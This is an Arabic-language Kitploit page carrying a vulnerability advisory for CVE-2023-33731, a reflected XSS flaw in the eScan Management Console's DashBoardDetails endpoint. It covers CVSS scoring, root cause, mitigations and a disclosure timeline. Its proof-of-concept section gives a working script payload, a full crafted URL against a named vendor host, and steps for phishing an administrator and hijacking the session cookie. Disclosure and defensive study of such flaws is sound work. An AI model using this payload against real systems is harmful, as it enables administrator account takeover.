Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-33731 — تم اكتشاف ثغرة من نوع Reflected Cross-Site Scripting (XSS) في وحدة التحكم الإدارية eScan (الإصدار 14.0.1400.2281) التي طورتها Microworld Technologies. | Kitploit
أدوات/GitHubGitHub/sahiloj/cve-2023-33731
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubsahiloj/cve-2023-33731

CVE-2023-33731

تم اكتشاف ثغرة من نوع Reflected Cross-Site Scripting (XSS) في وحدة التحكم الإدارية eScan (الإصدار 14.0.1400.2281) التي طورتها Microworld Technologies.

عرض المستودع
111منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-33731 — eScan Management Console: ثغرة XSS منعكسة (Reflected Cross-Site Scripting)

CVE Severity Type Affected Version Vendor Status


فهرس المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • شدة الثغرة ونقاط CVSS
  • المنتج المتأثر
  • التحليل الفني
  • إثبات المفهوم
  • التأثير
  • التخفيف والمعالجة
  • الجدول الزمني للإفصاح
  • المراجع
  • المؤلف

  • نظرة عامة

    تم اكتشاف ثغرة من نوع Cross-Site Scripting المنعكسة (Reflected XSS) في eScan Management Console (الإصدار 14.0.1400.2281) التي طورتها Microworld Technologies. توجد الثغرة في نقطة النهاية تفاصيل لوحة القيادة (DashBoardDetails)، حيث تنعكس معلمات سلسلة الاستعلام المتعددة في استجابة HTML دون تعقيم أو ترميز مناسب للمخرجات. يمكن لمهاجم غير مصادق عليه إنشاء رابط ضار وخداع مسؤول مصادق عليه للنقر عليه، مما يؤدي إلى تنفيذ JavaScript عشوائي في جلسة المتصفح الخاصة بالضحية.


    تفاصيل الثغرة

    الحقلالقيمة
    CVE IDCVE-2023-33731
    نوع الثغرةCross-Site Scripting المنعكسة (Reflected XSS)
    CWECWE-79 — التعقيم غير الصحيح للمدخلات أثناء توليد صفحة الويب
    المنتج المتأثرMicroworld Technologies eScan Management Console
    الإصدار المتأثر14.0.1400.2281
    النقطة النهائية المعرضة/ewconsole/ewconsole.dll/DashBoardDetails
    المعلمات المعرضةtype, subtype, result
    ناقل الهجومشبكة (رابط معدّل يتم تسليمه عبر التصيد / الهندسة الاجتماعية)
    المصادقة المطلوبةيجب أن يكون الضحية مصادقًا عليه؛ لا يحتاج المهاجم إلى بيانات اعتماد
    تم الاختبار علىWindows
    تم الإفصاح30 مايو 2023
    الصفحة الرئيسية للبائعhttps://www.escanav.com

    شدة الثغرة ونقاط CVSS

    المقياسالقيمة
    الدرجة الأساسية6.1 (متوسطة)
    ناقل الهجومشبكة
    تعقيد الهجوممنخفض
    الصلاحيات المطلوبةلا شيء
    تفاعل المستخدممطلوب
    النطاقمتغير
    السريةمنخفضة
    السلامةمنخفضة
    التوفرلا شيء

    CVSS 3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N


    المنتج المتأثر

    • المنتج: eScan Management Console (منصة إدارة أمن نقطة النهاية القائمة على الويب)
    • البائع: Microworld Technologies
    • الإصدار: 14.0.1400.2281
    • رابط البرنامج: https://cl.escanav.com/ewconsole.dll
    • المنصة: Windows

    التحليل الفني

    يعرض eScan Management Console واجهة ويب (ewconsole.dll) تدير عمليات إدارية مختلفة، بما في ذلك عروض لوحة القيادة. تقبل نقطة النهاية DashBoardDetails عدة معلمات سلسلة استعلام (type, subtype, result, windowname, DisplayOSSelection) وتستخدم قيمها لإنشاء محتوى HTML ديناميكيًا في استجابة الخادم.

    السبب الجذري

    يفشل كود الخادم في تعقيم أو تشفير HTML للمدخلات التي يوفرها المستخدم قبل تضمينها في نص الاستجابة. تحديدًا، تنعكس قيمة المعلمة type مباشرة في سياق سمة HTML دون تخطي الأحرف الخاصة مثل ", <, و>. وهذا يسمح للمهاجم بالخروج من سياق السمة وحقن علامات HTML/JavaScript عشوائية.

    نفس الخلل موجود في المعلمات subtype وresult.

    الطلب المعرض

    root@kitploit:~
    GET /ewconsole/ewconsole.dll/DashBoardDetails?type=<PAYLOAD>&subtype=<PAYLOAD>&result=<PAYLOAD>&windowname=usrmgmt&DisplayOSSelection=true
    Host: cl.escanav.com
    

    تفصيل الحمولة

    الحمولة المشفرة لـ URL PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E تفك تشفيرها إلى:

    root@kitploit:~
    PS"><script>alert(document.cookie)</script>
    
    الجزءالغرض
    PS"يغلق قيمة سمة HTML الموجودة (تنهي " السمة)
    >يغلق علامة HTML المحيطة
    <script>alert(document.cookie)</script>يحقن كتلة سكريبت تنفذ JavaScript، هنا لسرقة ملف تعريف الارتباط الخاص بالجلسة

    إثبات المفهوم

    ⚠️ لأغراض تعليمية وبحث أمني مصرّح به فقط.

    المتطلبات الأساسية

    1. يجب أن يكون الضحية مسجلاً دخوله في eScan Management Console كمستخدم مصادق عليه (مثل مسؤول).
    2. يقوم المهاجم بتسليم الرابط المعدّل التالي للضحية (عبر التصيد الإلكتروني، رسالة محادثة، أو رابط مضمن).

    خطوات إعادة الإنتاج

    الخطوة 1: سجل الدخول إلى eScan Management Console باستخدام بيانات اعتماد صالحة.

    الخطوة 2: انتقل إلى (أو قدم لمسؤول مصادق عليه) الرابط المعدّل التالي:

    root@kitploit:~
    https://cl.escanav.com/ewconsole/ewconsole.dll/DashBoardDetails?type=PS%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&subtype=13&result=3&windowname=usrmgmt&DisplayOSSelection=true
    

    الحمولة المفك تشفيرها في المعلمة type:

    root@kitploit:~
    PS"><script>alert(document.cookie)</script>
    

    الخطوة 3: عند تحميل الصفحة، يتم تنفيذ السكريبت المحقون في المتصفح. يظهر مربع حوار تنبيه يعرض ملف تعريف الارتباط النشط للجلسة الخاصة بالضحية.

    تنبيه XSS مع ملف تعريف الارتباط للجلسة

    الخطوة 4: يلتقط المهاجم قيمة ملف تعريف الارتباط للجلسة ويستخدمها لاختطاف جلسة المسؤول، مما يمنحه السيطرة الكاملة على وحدة التحكم الإدارية.

    تم التقاط ملف تعريف الارتباط للجلسة


    التأثير

    الاستغلال الناجح لهذه الثغرة يسمح للمهاجم بـ:

    • اختطاف الجلسة / الاستيلاء على الحساب: سرقة ملف تعريف الارتباط للجلسة الخاص بالمسؤول المصادق عليه وانتحال شخصيته دون الحاجة لبيانات اعتماده.
    • سرقة بيانات الاعتماد: حقن نموذج تسجيل دخول مزيف أو مسجل نقرات لالتقاط أسماء المستخدمين وكلمات المرور.
    • توزيع البرمجيات الخبيثة: إعادة توجيه الضحية إلى موقع ضار أو تنزيل برمجيات خبيثة بصمت.
    • التلاعب بواجهة المستخدم / تشويهها: تغيير محتوى صفحة وحدة التحكم الإدارية لتضليل المسؤول.
    • تصعيد الصلاحيات: نظرًا لأن الهدف عادةً ما يكون مسؤولًا، يؤدي الهجوم الناجح إلى سيطرة كاملة على منصة إدارة أمن نقطة النهاية، مما قد يضر بجميع نقاط النهاية المُدارة في المؤسسة.

    التخفيف والمعالجة

    للبائع / المطورين

    1. ترميز المخرجات: قم بتشفير جميع المدخلات التي يوفرها المستخدم باستخدام HTML قبل عكسها في الاستجابات (مثل < → &lt;, > → &gt;, " → &quot;, ' → &#x27;).
    2. التحقق من صحة المدخلات: فرض قوائم السماح الصارمة؛ على سبيل المثال، يجب أن يقبل subtype وresult القيم الرقمية فقط ويرفض أي شيء آخر.
    3. سياسة أمان المحتوى (CSP): نشر رأس استجابة HTTP صارم لـ Content-Security-Policy لمنع تنفيذ السكريبت المضمن.
    4. علم HttpOnly لملفات تعريف الارتباط: تعيين السمة HttpOnly على ملفات تعريف ارتباط الجلسة بحيث لا يمكن لـ JavaScript الوصول إليها، مما يحد بشكل كبير من تأثير أي ثغرة XSS.
    5. الترقية / التصحيح: قم بتطبيق أحدث التصحيحات الأمنية أو الترقية إلى إصدار من eScan Management Console يعالج هذه الثغرة.

    لمديري النظام / المستخدمين

    • تجنب النقر على الروابط غير المرغوب فيها أو غير المتوقعة التي تشير إلى eScan Management Console الخاص بك.
    • قصر الوصول إلى وحدة التحكم الإدارية على الشبكات الموثوقة؛ لا تعرضها مباشرة للإنترنت العام — استخدم VPN أو قائمة السماح لعناوين IP.
    • راقب نشاط الجلسة ودقق جميع الإجراءات الإدارية.
    • قم بتطبيق تحديثات الأمان التي يوفرها البائع على الفور.

    الجدول الزمني للإفصاح

    التاريخالحدث
    2023-05-30تم اكتشاف الثغرة وتوثيقها بواسطة Sahil Ojha
    2023-05-30الإفصاح العام / تعيين CVE: CVE-2023-33731

    المراجع

    • NVD — CVE-2023-33731
    • Microworld Technologies — eScan Management Console
    • CWE-79: التعقيم غير الصحيح للمدخلات أثناء توليد صفحة الويب
    • OWASP: Cross-Site Scripting (XSS)
    • بطاقة المساعدة للوقاية من XSS من OWASP

    المؤلف

    Sahil Ojha

    تم البحث في هذه الثغرة بشكل مسؤول والإفصاح عنها لزيادة الوعي حول نقاط الضعف الأمنية في برامج إدارة الأمن المستخدمة على نطاق واسع. جميع المعلومات المقدمة هنا مخصصة حصريًا للأغراض التعليمية والدفاعية في مجال البحث الأمني.

    تنزيل الأداة